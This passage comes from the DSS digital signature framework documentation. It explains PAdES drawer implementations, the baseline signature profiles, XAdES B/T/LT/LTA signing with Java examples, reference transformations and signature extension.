\nIf your integration require dss-crl-parser, you will need to choose your implementation.\n\n[[dssPades]]\n=== DSS PAdES\n\nSince the version 5.4, DSS allows generation\/extension\/validation PAdES signatures with two different frameworks : PDFBox and OpenPDF (fork of iText). The dss-pades module only contains the common code and requires an underlying implementation : \n \n * dss-pades-pdfbox : Supports drawing of custom text, images, as well as text+image, in a signature field.\n * dss-pades-openpdf : Supports drawing of custom text OR images in a signature field.\n\nDSS permits to override the visible signature generation with these interfaces : \n\n * eu.europa.esig.dss.pdf.IPdfObjFactory\n * eu.europa.esig.dss.pdf.visible.SignatureDrawerFactory (selects the SignatureDrawer depending on the SignatureImageParameters content)\n * eu.europa.esig.dss.pdf.visible.SignatureDrawer\n\nA new instance of the IPdfObjFactory can be created with its own SignatureDrawerFactory and injected in the padesService.setPdfObjFactory(IPdfObjFactory). By default, DSS uses an instance of ServiceLoaderPdfObjFactory. This instance checks for any registered implementation in the classpath with the ServiceLoader (potentially a service from dss-pades-pdfbox, dss-pades-openpdf or your own(s)).\n\n==== DSS PDFBox\n\nSince the version 5.5, DSS allows switching between two implementations of the framework PDFBox : default (original) and native.\n\n * Default Drawer : The original drawer implemented on the PDFBox framework, supports displaying of custom text, images, text+image combination in a signature field. The implementation does not include the provided custom text to the inner PDF structure, instead of it, the drawer creates an image representation of the provided text, which is added to the signature field (i.e. the text is not selectable and not searchable).\n * Native Drawer : Since the version 5.5, DSS includes a new implementation of PDFBox Drawer, that allows a user to add a real custom text, image or combination of text and image to a visible signature field. The native implementation embeds the provided custom text to the inner PDF structure, that makes the text selectable and searchable, and also clearer and smoother in comparison with the original implementation.\n\nBy default, DSS uses \"Default Drawer\" as the PDFBox implementation. In order to switch the implementation, that allowed in runtime, you have to set a new instance for PdfObjFactory as following:\n\n[source,java,indent=0]\n.Runtime PDF Object Factory changing\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=custom-factory]\n----\n\n== Available demonstrations\n\nWith the framework, some demonstrations are provided.\n\n[horizontal]\ndss-mock-tsa:: The class which generate false timestamps from a self-signed certificate.\nsscd-mocca-adapter:: Adapter for the MOCCA connection.\ndss-standalone-app:: Standalone application which allows signing a document with different formats and tokens (JavaFX).\ndss-standalone-app-package:: Packaging module for dss-standalone-app.\ndss-demo-webapp:: Demonstration web application which presents a part of the DSS possibilities.\ndss-demo-bundle:: Packaging module for dss-demo-webapp.\n\nWARNING: The demonstrations use a simulated timestamp service (Mock) so that is not recommended for a production usage.\n\nThe requirements and build instructions for DSS demonstrations can be found in the chapter <<DSSDemo>>.\n\n== Signature's profile simplification\n\nThe different formats of the digital signature make possible to cover a wide range of real live cases of use of this technique. Thus we distinguish the following formats: XAdES, CAdES, PAdES, JAdES and ASIC. To each one of them a specific standard is dedicated. The wide variety of options, settings and versions of the standards makes their interoperability very difficult. This is the main reason for which new standards commonly called \"baseline profiles\" were published. Their goal is to limit the number of options and variants thereby making possible a better interoperability between different actors.\n\nIn general can be said that for each format of the digital signature the number of security levels defined in the new standards has been reduced. Below is a comparative table of old and new levels for each format of the signature:\n\n[%header,cols=7*^.^]\n.Signature supported profiles\n|=======================\n2+|XAdES\t\t\t\t 2+|CAdES\t\t\t\t 2+|PAdES |JAdES\n|*STANDARD* \t |*BASELINE*\t |*STANDARD* |*BASELINE* \t |*STANDARD*\t |*BASELINE* |*BASELINE*\n|XAdES-BES \t\t.2+|XAdES-B\t |CAdES-BES \t.2+|CAdES-B \t |PAdES-BES .2+|PAdES-B .2+|JAdES-B\n|XAdES-EPES\t\t\t\t\t |CAdES-EPES\t \t\t\t |PAdES-EPES\n|XAdES-T \t\t |XAdES-T |CAdES-T \t |CAdES-T \t |PAdES-T \t |PAdES-T |JAdES-T\n|XAdES-XL \t\t |XAdES-LT \t |CAdES-XL |CAdES-LT \t |PAdES-XL \t |PAdES-LT |JAdES-LT\n|XAdES-A \t\t |XAdES-LTA\t |CAdES-A \t |CAdES-LTA \t |PAdES-LTV \t |PAdES-LTA |JAdES-LTA\n|=======================\n\nNote that the new version (v4) of the DSS framework is compatible with the baseline profiles, it is no longer possible to use the standard profiles for signing purpose. The validation of the signature still takes into account the old profiles.\n\n[.landscape]\n<<<\n\n=== Signature profile guide\n\nBelow you can find a table specifying various signature possibilities with available in DSS signature's profiles\/formats.\nThe vertical column specifies available signature profiles and their extensions. The horizontal row specifies types of documents to be signed with the formats.\n\n.File formats and Signature types conformance\n[%header,cols=\"12*^.^\"]\n|===\n 3+|Signature profiles |XML |JSON |PDF |Binary |Digest |Multiple files |Multiple signatures |Counter signature |Stand-alone timestamp\n.10+|XAdES .4+|Enveloping |Base64 encoded |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Embed XML |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Manifest |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .4+|Enveloped |enveloped transformation |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on XPath |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on Filter2 |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Internally Detached |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|CAdES 2+|Enveloping |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n|PAdES 2+|Enveloped |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"]\n.6+|JAdES .3+|Enveloping |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .3+|Detached |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|ASiC |ASiCS |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n |ASiCE |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n|===\n\n[.portrait]\n<<<\n\n== The XML Signature (XAdES)\n\nThe simplest way to address the digital signature passes through the XAdES format. Indeed, it allows visualization of the signature content with a simple text editor. Thus it becomes much easier to make the connection between theoretical concepts and their implementation. Before embarking on the use of the DSS framework, it is advisable to read the following documents:\n\n * XAdES Specifications (cf. <<R01>>)\n\nAfter reading these documents, it is clear that:\n\n * To electronically sign a document, a signing certificate (that proves the signer's identity) and the access to its associated private key is needed. \n * To electronically validate a signed document the signer's certificate containing the public key is needed. To give a more colourful example: when a digitally signed document is sent to a given person or organization in order to be validated, the certificate with the public key used to create the signature must also be provided.\n\n===\tXAdES Profiles\n\nThe new ETSI standard defines four conformance levels to address the growing need to protect the validity of the signature in time. Henceforth to denote the level of the signature the word \"level\" will be used. Follows the list of levels defined in the standard:\n\n * XAdES-BASELINE-*B*: _Basic Electronic Signature_\nThe lowest and simplest version just containing the SignedInfo, SignatureValue, KeyInfo and SignedProperties. This level combines the old -BES and -EPES levels.\nThis form extends the definition of an electronic signature to conform to the identified signature policy.\n * XAdES-BASELINE-*T*: _Signature with a timestamp_\nA timestamp regarding the time of signing is added to protect against repudiation.\n * XAdES-BASELINE-*LT*: _Signature with Long Term Data_\nCertificates and revocation data are embedded to allow verification in future even if their original source is not available. This level is equivalent to the old -XL level.\n * XAdES-BASELINE-*LTA*: _Signature with Long Term Data and Archive timestamp_\nBy using periodical timestamping (e.g. each year) compromising is prevented which could be caused by weakening previous signatures during a long-time storage period. This level is equivalent to the old -A level.\n\nNOTE: Old levels: -BES, -EPES, -C, -X, -XL, -A are not supported any more when signing.\n\n==== XAdES-BASELINE-B\n\nTo start, let's take a simple XML document:\n\n[[xml_example.xml]]\n[source,xml]\n.xml_example.xml\n----\n<?xml version=\"1.0\"?>\n<test>Hello World !<\/test>\n----\n\nSince this is an XML document, we will use the XAdES signature and more particularly XAdES-BASELINE-B level, which is the lowest level of protection: just satisfying Directive (cf. <<R07>>) legal requirements for advanced signature. The normal process of signing wants to sign first with the level -B or level-T, and then later when it becomes necessary to complete the signature with superior levels. However, the framework allows signing directly with any level.\nWhen signing data, the resulting signature needs to be linked with the data to which it applies. This can be done either by creating a data set which combines the signature and the data (e.g. by enveloping the data with the signature or including a signature element in the data set) or placing the signature in a separate resource and having some external means for associating the signature with the data. So, we need to define the packaging of the signature, namely ENVELOPED, ENVELOPING, DETACHED or INTERNALLY-DETACHED. More information about supported reference transformations for each signature packaging (except 'Detached'), can be found in the section <<Reference Transformations>>\n \n * *ENVELOPED :* when the signature applies to data that surround the rest of the document;\n * *ENVELOPING :* when the signed data form a sub-element of the signature itself;\n ** Base64 encoded binaries;\n ** Embed XML object(s);\n ** Embed https:\/\/www.w3.org\/TR\/xmldsig-core\/#sec-o-Manifest[Manifest] object(s).\n * *DETACHED :* when the signature relates to the external resource(s) separated from it.\n * *INTERNALLY-DETACHED :* when the signature and the related signed data are both included in a parent element (only XML).\n\nFor our example, we will use ENVELOPED packaging.\n\nThe DSS framework uses 3 atomic steps to sign a document :\n\n. Compute the digest to be signed;\n. Sign the digest; \n. Sign the document (add the signed digest).\n\nThe DSS fully manages the steps 1 and 3. We need to specify how to do the signature operation. DSS offers some implementations in the dss-token module\n\nTo write our Java code, we still need to specify the type of KeyStore to use for signing our document, more simply, where the private key can be found. In the package \"eu.europa.esig.dss.token\", we can choose between different connection tokens :\n\n * *Pkcs11SignatureToken :* allows communicating with SmartCards with the PKCS#11 interface. It requires some installed drivers (dll, sso,...) .\n * *Pkcs12SignatureToken :* allows signing with a PKC#12 keystore (.p12 file).\n * *MSCAPISignatureToken :* handles the signature with MS CAPI (the Microsoft interface to communicate with SmartCards).\n * *JKSSignatureToken :* allows signing with a Java Key Store (.jks file).\n\nNOTE: The DSS also provides the support for MOCCA framework to communicate with the Smartcard with PC\/SC, but it involves the installation of the MOCCA and IAIK libraries.\n\nTo know more about the use of the different signature tokens, please consult \"Management of Signature Tokens\" chapter.\n\nIn our example the class: \"Pkcs12SignatureToken\" will be used. A file in PKCS#12 format must be provided to the constructor of the class. It contains an X.509 private key accompanying the public key certificate and protected by symmetrical password. The certification chain can also be included in this file. It is possible to generate dummy certificates and their chains with OpenSSL. Please visit http:\/\/www.openssl.org\/ for more details.\n\nThis is the complete code that allows you to sign our XML document.\n\n[source,java,indent=0]\n.Create a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBTest.java[tags=demo]\n----\n\nWhat you may notice is that to sign a document we need to:\n\n * Create an object based on SignatureParameters class. The number of specified parameters depends on the type of signature. Generally, the number of specified parameters depends on the profile of signature. This object also defines some default parameters.\n * Choose the profile, packaging, signature digest algorithm.\n * Indicate the private key entry to be used.\n * Instantiate the adequate signature service.\n * Carry out the signature process.\n \nThe encryption algorithm is determined by the private key and therefore cannot be compelled by the setter of the signature parameters object. It will cause an inconsistency in the signature making its validation impossible. This setter can be used in a particular context where the signing process is distributed on different machines and the private key is known only to the signature value creation process. See clause \"Signing process\" for more information.\nIn the case where the private key entry object is not available, it is possible to choose the signing certificate and its certificate chain as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoCertificateChain]\n----\n\nIntegrating the certificate chain in the signature simplifies the build of a prospective certificate chain during the validation process.\n\nBy default the framework uses the current date time to set the signing date, but in the case where it is necessary to indicate the different time it is possible to use the setter \"setSigningDate(Date)\" as in the example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningDate]\n----\n\nWhen the specific service is instantiated a certificate verifier must be set. This object is used to provide four different sources of information:\n\n * the source of trusted certificates (based on the trusted list(s) specific to the context);\n * the source of intermediate certificates used to build the certificate chain till the trust anchor. This source is only needed when these certificates are not included in the signature itself;\n * the source of OCSP;\n * the source of CRL.\n \nIn the current implementation this object is only used when profile -LT or -LTA are created. \n\n===== Signing process\n\nOnce the parameters of the signature were identified the service object itself must be created. The service used will depend on the type of document to sign. In our case it is an XML file, so we will instantiate a XAdES service. The process of signing takes place in three stages. The first is the `getDataToSign()` method call, passing as a parameter the document to be signed and the previously selected settings. This step returns the data which is going to be digested and encrypted. In our case it corresponds to the SignedInfo XMLDSig element. \n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessGetDataToSign]\n----\n\nThe next step is a call to the function `sign()` which is invoked on the object token representing the KeyStore and not on the service. This method takes three parameters. The first is the array of bytes that must be signed. It is obtained by the previous method invocation. The second is the algorithm used to create the digest. You have the choice between SHA1, SHA256, and SHA512 (this list is not exhaustive). And the last one is the private key entry.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSign]\n----\n\nThe last step of this process is the integration of the signature value in the signature and linking of that one to the signed document based on the selected packaging method. This is the method `signDocument()` on the service. We must pass to it three parameters: again the document to sign, the signature parameters and the value of the signature obtained in the previous step.\n\nThis separation into three steps allows use cases where different environments have their precise responsibilities: specifically the distinction between communicating with the token and executing the business logic.\n\nWhen the breakdown of this process is not necessary, than a simple call to only one method can be done as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSignDocument]\n----\n\n===== Additional attributes\n\nFor this type (XAdES-BASELINE-B) of signature it is possible to identify some additional attributes.\n\n[[SignXmlXadesBPropertiesTest.java]]\n[source,java,indent=0]\n.XAdES signature with additional signed attributes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBPropertiesTest.java[tags=demo]\n----\n\nIn XAdES format the following types of a Content Timestamp can be used:\n\n * AllDataObjectsTimeStamp - each time-stamp token within this property covers the full set of references defined in the Signature's SignedInfo element, excluding references of type \"SignedProperties\".\n * IndividualDataObjectsTimeStamp - each time-stamp token within this property covers selected signed data objects.\n\nThe code above produces the following signature :\n\n.XAdES signature example\ninclude::_samples\/xades-b-properties.adoc[]\n\n==== XAdES-BASELINE-T\n\nXAdES-BASELINE-T is a signature for which there exists a trusted time associated to the signature. It provides the initial steps towards providing long term validity and more specifically it provides a protection against repudiation. This extension of the signature can be created as well during the generation process as validation process. However, the case when these validation data are not added during the generation process should no longer occur. The XAdES-BASELINE-T trusted time indications must be created before the signing certificate has been revoked or expired and close to the time that the XAdES signature was produced. The XAdES-BASELINE-T form must be built on a XAdES-BASELINE-B form. The DSS framework allows extending the old -BES and -EPES profiles to the new BASELINE-T profile, indeed there is no difference in the structure of the signature.\n\nTo implement this profile of signature you must indicate to the service the TSA source, which delivers from each Timestamp Request a Timestamp Response (RFC 3161 (cf. <<R08>>)) containing tokens. Below is the source code that creates a XAdES-BASELINE-T signature. For our example, we will use the Belgian provider and an instance of OnlineTSPSource (see \"TSP Sources\" chapter for more details).\n\n[source,java,indent=0]\n.Create a XAdES-Baseline-T with an OnlineTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesTWithOnlineSourceTest.java[tags=demo]\n----\n\nIf the timestamp source is not set a NullPointerException is thrown.\n\nThe SignatureTimeStamp mandated by the XAdES-T form appears as an unsigned property within the QualifyingProperties:\n\n.XAdES Signature Timestamp\ninclude::_samples\/xades-signature-timestamp.adoc[]\n\n==== XAdES-BASELINE-LT\n\nThis level has to prove that the certification path was valid, at the time of the validation of the signature, up to a trust point according to the naming constraints and the certificate policy constraints from the \"Signature Validation Policy\". It will add to the signature the CertificateValues and RevocationValues unsigned properties. The CertificateValues element contains the full set of certificates that have been used to validate the electronic signature, including the signer's certificate. However, it is not necessary to include one of those certificates, if it is already present in the ds:KeyInfo element of the signature. This is like DSS framework behaves. In order to find a list of all the certificates and the list of all revocation data, an automatic process of signature validation is executed. To carry out this process an object called CertificateVerifier must be passed to the service. The implementer must set some of its properties (e.g. a source of trusted certificates). The code below shows how to use the default parameters with this object. Please refer to \"The Signature Validation\" chapter to have the further information. It also includes an example of how to implement this level of signature:\n\n[[SignXmlXadesLTTest.java]]\n[source,java,indent=0]\n.SignXmlXadesLTTest.java\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesLTTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.Validation data values\ninclude::_samples\/xades-revocation-data.adoc[]\n\nNOTE: The use of online sources can significantly increase the execution time of the signing process. For testing purpose you can create your own source of data.\n\nIn last example the CommonsHttpDataLoader is used to provide the communication layer for HTTP protocol. Each source which need to go through the network to retrieve data need to have this component set.\n\n==== XAdES-BASELINE-LTA\n\nWhen the cryptographic data becomes weak and the cryptographic functions become vulnerable the auditor should take steps to maintain the validity of the signature. The XAdES-BASELINE-A form uses a simple approach called \"archive validation data\". It adds additional time-stamps for archiving signatures in a way that they are still protected, but also to be able to prove that the signatures were validated at the time when the used cryptographic algorithms were considered safe. The time-stamping process may be repeated every time the protection used becomes weak. Each time-stamp needs to be affixed before either the signing key or the algorithms used by the TSA are no longer secure. XAdES-A form adds the ArchiveTimestamp element within the UnsignedSignatureProperties and may contain several ArchiveTimestamp elements.\n\nBelow is an example of the implementation of this level of signature (but in practice, we will rather extend the signature to this level when there is a risk that the cryptographic functions become vulnerable or when one of certificates arrives to its expiration date):\n\n[source,java,indent=0]\n.Signature level setting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSignatureLevel]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.XAdES Archive Timestamp\ninclude::_samples\/xades-archive-timestamp.adoc[]\n\n=== Versions support\n\nDSS supports the following XAdES formats :\n\n[cols=\"5*^\"]\n.Supported XAdES versions\n|===\n| | B-level | T-level | LT-level | LTA-level\n\n| XAdES 1.1.1 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.2.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.3.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| XAdES 1.4.1 4+| The format contains qualifying properties for XAdES 1.3.2 LTA level\n|===\n\nThe XAdES Profile, as well as a customizable prefixes can be set with following methods :\n\n[source,java,indent=0]\n.XAdES formats and prefixes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoPrefixes]\n----\n\n=== Reference Transformations\n\nIn case of 'Enveloping', 'Enveloped' and 'Internally Detached' signatures, it is possible to apply custom transformations for signing references in order to compute proper digest result. Example of a definition reference transformations, you can find below:\n\n[[SignXmlXadesBWithTransformsTest.java]]\n[source,java,indent=0]\n.Custom transformations definition\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demo]\n----\n\nCurrent version of DSS supports the following transformations:\n\n * Enveloped - removes the current `Signature` element from the digest calculation of the reference.\n\nWARNING: Enveloped Signature Transform does not support parallel signatures!\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedTransform]\n----\n\n * Canonicalization - any canonicalization algorithm that can be used for 'CanonicalizationMethod' can be used as a transform:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoCanonicalizationTransform]\n----\n\n * Base64 - the transform is used if application needs to sign a RAW data (binaries, images, audio or other formats). The 'Base64 Transform' is not compatible with following signature parameters:\n\n ** Reference contains more than one transform (must be a sole element of the reference transforms);\n ** setEmbedXML(true) - embedded setting cannot be used;\n ** setManifestSignature(true) - As is apparent from the previous point, Manifest cannot be used with the Base64 Transform as well since it also must be embedded to the signature.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoBase64Transform]\n----\n\n * XPath - allows signing a custom nodes in a signature or embedded document. DSS contains an additional class `XPathEnvelopedSignatureTransform` allowing to exclude signatures from the digested content (used for Enveloped signatures by default). Additional information about the 'XPath Transform' can be found https:\/\/www.w3.org\/TR\/xpath20\/[by the link].\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPathTransform]\n----\n\n * XPath-2-Filter - an alternative to 'XPath Transform'. Additional information about the 'XPath2Filter Transform' can be found https:\/\/www.w3.org\/TR\/xmldsig-filter2\/[by the link]. DSS contains an additional class `XPath2FilterEnvelopedSignatureTransform` allowing to exclude signatures from the digest calculation.\n\nNOTE: Since DSS 5.7 the XPath-2-Filter transform is used by default for ENVELOPED signature packaging.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPath2FilterTransform]\n----\n\n * XSLT Transform - This transform requires a 'org.w3.dom.Document' as an input, compatible with the normative https:\/\/www.w3.org\/TR\/xslt-30\/[XSLT Specification]. Must be a sole transform.\n\nNOTE: All transformations, except Base64, can be applied only to XML objects.\n\n=== Multiple signatures\n\nIn everyday life, there are many examples where it is necessary to have multiple signatures covering the same document, such as a contract to purchase a vehicle. Independent signatures are parallel signatures where the ordering of the signatures is not important. The computation of these signatures is performed on exactly the same input but using different private keys.\n\n=== XAdES and specific schema version\n\nSome signatures may have been created with an older version of XAdES standard using different schema definition. To take into account the validation of such signatures the interface eu.europa.esig.dss.xades.definition.XAdESPaths was created. This interface allows to provide the different needed XPath expressions which are used to explore the elements of the signature. The DSS framework proposes 3 implementations : \n\n * XAdES132Paths (XAdES 1.3.2 \/ 1.4.1)\n * XAdES122Paths (XAdES 1.2.2)\n * XAdES111Paths (XAdES 1.1.1)\n\nBy default, all XAdES are supported and DSS loads\/parses all versions of XAdES. That's possible to restrict to only one version of XAdES with the following code : \n\n[source,java,indent=0]\n.Customize the supported XAdES version(s) at the validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/XAdES132OnlyTest.java[tags=demo]\n----\n\n=== Sign a Trusted List\n\nThe standard ETSI TS 119 612 specifies in its annex B the XML structure and the format of the signature (XAdES, enveloped signature, transformation, canonicalization, etc.). With the class `TrustedListSignatureParametersBuilder`, DSS is able to pre-configure the signature parameters to comply with the specifications and simplify the signature creation.\n\n[source,java,indent=0]\n.Sign a Trusted List with the TrustedListSignatureParametersBuilder\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignTrustedListTest.java[tags=demo]\n----\n\n== Signature Extension\n\nThe -B level contains immutable signed properties. Once this level is created, these properties cannot be changed.\n\nThe levels -T\/-LT\/-LTA add unsigned properties to the signature. This means that the properties of these levels could be added afterwards to any AdES signature. This addition helps to make the signature more resistant to cryptographic attacks on a longer period of time. The extension of the signature is incremental, i.e. when you want to extend the signature to the level -LT the lower level (-T) will also be added. The whole extension process is implemented by reusing components from signature production. To extend a signature we proceed in the same way as in the case of a signature, except that you have to call the function \"extendDocument\" instead of the \"sign\" function. Note that when the document is signed with several signatures then they are all extended.\n\n=== BASELINE-T\n\nThe AdES-BASELINE-T trusted time indications have to be created before a certificate has been revoked 